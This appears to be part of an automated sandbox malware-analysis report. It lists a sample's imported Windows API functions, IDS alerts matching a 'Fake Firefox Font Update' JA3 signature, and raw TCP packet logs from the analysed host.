ole32.dll | CoInitializeEx, CoInitialize, CoInitializeSecurity, CoUninitialize, CLSIDFromProgID, CoTaskMemFree, StringFromGUID2, CoCreateInstance
OLEAUT32.dll | VariantInit, SysAllocString, VariantClear, SysFreeString
RPCRT4.dll | UuidCreate
SHELL32.dll | SHGetFolderPathW, CommandLineToArgvW, ShellExecuteExW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-09T14:42:21.593732+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49973 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:22.982174+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49974 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:23.774733+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49975 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:40.385432+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50061 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:41.480461+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50065 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:56.274932+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50084 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:57.838141+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50085 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:58.805925+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50086 | 104.21.80.52 | 443 | TCP
2025-01-09T14:42:59.719074+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50087 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:00.973940+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50088 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:02.883336+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50089 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:04.240842+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50090 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:09.026281+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50091 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:10.054240+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50092 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:10.982316+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50093 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:11.774366+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50094 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:12.607238+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50095 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:13.524132+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50096 | 104.21.80.52 | 443 | TCP
2025-01-09T14:43:14.504321+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 50097 | 104.21.80.52 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 9, 2025 14:41:05.323810101 CET | 49674 | 443 | 192.168.2.7 | 104.98.116.138
Jan 9, 2025 14:41:05.325380087 CET | 49675 | 443 | 192.168.2.7 | 104.98.116.138
Jan 9, 2025 14:41:05.448788881 CET | 49672 | 443 | 192.168.2.7 | 104.98.116.138
Jan 9, 2025 14:41:10.558703899 CET | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jan 9, 2025 14:41:10.933218002 CET | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jan 9, 2025 14:41:11.683279037 CET | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jan 9, 2025 14:41:13.183293104 CET | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jan 9, 2025 14:41:14.933238029 CET | 49674 | 443 | 192.168.2.7 | 104.98.116.138
Jan 9, 2025 14:41:14.933280945 CET | 49675 | 443 | 192.168.2.7 | 104.98.116.138
Jan 9, 2025 14:41:15.058207989 CET | 49672 | 443 | 192.168.2.7 | 104.98.116.138
Jan 9, 2025 14:41:16.167710066 CET | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jan 9, 2025 14:41:17.498220921 CET | 443 | 49699 | 104.98.116.138 | 192.168.2.7
Jan 9, 2025 14:41:17.498327017 CET | 49699 | 443 | 192.168.2.7 | 104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:22.120771885 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                Jan 9, 2025 14:41:34.027144909 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                Jan 9, 2025 14:41:55.332781076 CET49699443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:55.339093924 CET44349699104.98.116.138192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:41:55.371767044 CET49938443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:55.371819973 CET44349938104.98.116.138192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:41:55.371893883 CET49938443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:55.382292986 CET49938443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:55.382311106 CET44349938104.98.116.138192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.075448036 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.075490952 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.075628042 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.085000038 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.085020065 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.593650103 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.593732119 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.595458984 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.595474005 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.595743895 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.636703968 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.714529037 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.714626074 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.714632034 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277318001 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277376890 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277406931 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277431011 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277455091 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277489901 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.277508020 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277529955 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.277925014 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.277932882 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277942896 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.278062105 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.278072119 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.281999111 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.282018900 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.282195091 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.282208920 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.282259941 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.362040043 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369249105 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369276047 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369297981 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369366884 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.369366884 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.369381905 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369590998 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369659901 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369684935 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369709015 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369725943 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.369731903 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369800091 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.369801044 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.370541096 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.370598078 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.370624065 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.370645046 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.370816946 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.370816946 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.370827913 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371536970 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371573925 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371597052 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371619940 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371640921 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371651888 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.371653080 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.371670008 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371690989 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.417882919 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.417907953 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.446392059 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.446489096 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.446517944 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.461595058 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.461627007 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.461846113 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.461859941 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.461889982 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462028980 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462035894 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462115049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462367058 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462373972 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462589979 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462625980 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462657928 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462748051 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462887049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462887049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462887049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462887049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.463021994 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.463042974 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.513715982 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.513751030 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.513820887 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.514115095 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.514127016 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.982094049 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.982173920 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.983632088 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.983638048 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.984020948 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.984781981 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.984807968 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.984813929 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.282088995 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.282224894 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.282289028 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.282525063 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.282541990 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.282558918 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.282563925 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.312052011 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.312088966 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.312386990 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.312527895 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.312535048 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.774386883 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.774733067 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:37.594029903 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:37.594463110 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:37.594476938 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.620692015 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:37.620733023 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.623347044 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:37.623347998 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:37.623399973 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.649740934 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:37.649760962 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.649857998 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:37.650059938 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:37.650070906 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.695339918 CET44350024162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:37.695517063 CET50024443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:37.714766026 CET50020443192.168.2.7184.51.149.176
                                                                                                                                                                Jan 9, 2025 14:42:38.177354097 CET44349938104.98.116.138192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.179555893 CET49938443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:42:38.213907957 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.267672062 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:38.273554087 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:38.273559093 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.275120020 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.275134087 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.275175095 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:38.277379036 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:38.277379036 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:38.277393103 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.277471066 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.282088041 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.282530069 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.282557964 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.283579111 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.283721924 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.288093090 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.288161039 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.288404942 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.288422108 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.316957951 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:38.316967964 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.328011036 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.359042883 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:38.398998976 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.399055958 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.399138927 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.423933983 CET50029443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.423953056 CET4435002918.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.426799059 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.426843882 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.426913977 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.427110910 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.427144051 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.447930098 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.448024035 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.448405027 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:38.449743032 CET50028443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:38.449759960 CET4435002820.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.833919048 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.834191084 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:38.834212065 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.835592031 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.835649967 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:38.836779118 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:38.836841106 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.837047100 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:38.837054014 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.837081909 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:38.837143898 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.878268957 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:38.985380888 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.985783100 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.985800982 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.986183882 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.987754107 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:38.987844944 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:38.988652945 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:39.026683092 CET50051443192.168.2.7204.79.197.219
                                                                                                                                                                Jan 9, 2025 14:42:39.026710987 CET44350051204.79.197.219192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.027761936 CET50051443192.168.2.7204.79.197.219
                                                                                                                                                                Jan 9, 2025 14:42:39.029359102 CET50052443192.168.2.7104.70.121.146
                                                                                                                                                                Jan 9, 2025 14:42:39.029375076 CET44350052104.70.121.146192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.029685020 CET50052443192.168.2.7104.70.121.146
                                                                                                                                                                Jan 9, 2025 14:42:39.030859947 CET50053443192.168.2.7104.70.121.146
                                                                                                                                                                Jan 9, 2025 14:42:39.030881882 CET44350053104.70.121.146192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.030956984 CET50053443192.168.2.7104.70.121.146
                                                                                                                                                                Jan 9, 2025 14:42:39.031327009 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.031328917 CET50052443192.168.2.7104.70.121.146
                                                                                                                                                                Jan 9, 2025 14:42:39.031347036 CET44350052104.70.121.146192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.031583071 CET50051443192.168.2.7204.79.197.219
                                                                                                                                                                Jan 9, 2025 14:42:39.031600952 CET44350051204.79.197.219192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.032687902 CET50053443192.168.2.7104.70.121.146
                                                                                                                                                                Jan 9, 2025 14:42:39.032699108 CET44350053104.70.121.146192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.033159018 CET50054443192.168.2.7204.79.197.219
                                                                                                                                                                Jan 9, 2025 14:42:39.033185959 CET44350054204.79.197.219192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.033245087 CET50054443192.168.2.7204.79.197.219
                                                                                                                                                                Jan 9, 2025 14:42:39.033415079 CET50054443192.168.2.7204.79.197.219
                                                                                                                                                                Jan 9, 2025 14:42:39.033427000 CET44350054204.79.197.219192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.097968102 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.098033905 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.098114014 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:39.099124908 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:39.099142075 CET4435003818.173.219.111192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.099154949 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:39.099209070 CET50038443192.168.2.718.173.219.111
                                                                                                                                                                Jan 9, 2025 14:42:39.130301952 CET50055443192.168.2.7104.70.121.192
                                                                                                                                                                Jan 9, 2025 14:42:39.130331039 CET44350055104.70.121.192192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.131584883 CET50055443192.168.2.7104.70.121.192
                                                                                                                                                                Jan 9, 2025 14:42:39.131774902 CET50055443192.168.2.7104.70.121.192
                                                                                                                                                                Jan 9, 2025 14:42:39.131786108 CET44350055104.70.121.192192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.293593884 CET50057443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:39.293618917 CET4435005720.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.295336962 CET50057443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:39.301825047 CET50057443192.168.2.720.110.205.119
                                                                                                                                                                Jan 9, 2025 14:42:39.301841021 CET4435005720.110.205.119192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.343327045 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.343408108 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.343455076 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:39.343976021 CET50027443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:39.343986988 CET4435002740.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.444722891 CET50059443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:39.444741011 CET4435005940.79.167.8192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:39.444833994 CET50059443192.168.2.740.79.167.8
                                                                                                                                                                Jan 9, 2025 14:42:39.448549986 CET50059443192.168.2.740.79.167.8
